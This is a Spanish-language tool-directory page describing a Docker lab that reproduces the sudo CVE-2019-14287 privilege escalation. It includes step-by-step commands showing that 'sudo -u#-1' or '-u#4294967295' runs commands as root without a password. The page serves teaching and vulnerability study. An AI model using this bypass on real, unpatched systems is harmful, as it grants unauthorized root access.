Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cve-2019-14287 — PoC basado en Docker que demuestra la escalada de privilegios de sudo CVE-2019-14287 mediante la omisión de la restricción de usuario Runas, con instrucciones de reproducción paso a paso. | Kitploit
Herramientas/GitHubGitHub/lemonadern/poc-cve-2019-14287
Escalada de PrivilegiosSeguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónLabs y Práctica
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

PoC basado en Docker que demuestra la escalada de privilegios de sudo CVE-2019-14287 mediante la omisión de la restricción de usuario Runas, con instrucciones de reproducción paso a paso.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
14hace 1 añoAún no revisado

PoC de CVE-2019-14287

Resumen

Es un ejemplo que reproduce la vulnerabilidad de sudo (CVE-2019-14287) en un contenedor Docker.

Procedimiento del ejercicio

  1. Levantar el contenedor con docker compose up -d
  2. Entrar al contenedor con docker exec -it vulnerable_sudo_app bash
  3. Ejecutar los comandos whoami o id para confirmar que eres un usuario normal (no root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. Confirmar que sudo -u#0 whoami y sudo -u#0 id -u no se pueden ejecutar
    • Especificar 0 (root) como uid (opción -u) y ejecutar
    • Se solicita la contraseña, pero como no la conoces, no se puede ejecutar
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. Ejecutar sudo -u#-1 whoami y sudo -u#-1 id -u para confirmar que los comandos se ejecutan como root sin autenticación (reproducción de la vulnerabilidad)
    • Lo mismo se puede hacer con -u#4294967295
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

Referencias

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudoの脆弱性(CVE-2019-14287)についてまとめてみた - Qiita
Descargar herramienta